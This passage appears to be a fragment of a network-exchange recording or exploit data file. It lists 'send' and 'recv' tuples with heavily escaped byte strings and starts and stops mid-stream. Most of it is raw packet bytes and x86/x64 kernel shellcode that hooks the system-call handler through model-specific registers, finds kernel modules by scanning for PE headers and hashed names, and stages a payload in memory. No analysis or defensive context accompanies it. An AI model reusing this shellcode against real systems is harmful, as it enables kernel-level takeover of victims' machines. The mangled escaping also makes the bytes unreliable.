\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00 
\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\xef\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x18\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xff\\\\xcf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x009\\\\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', 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 3, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\
\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x8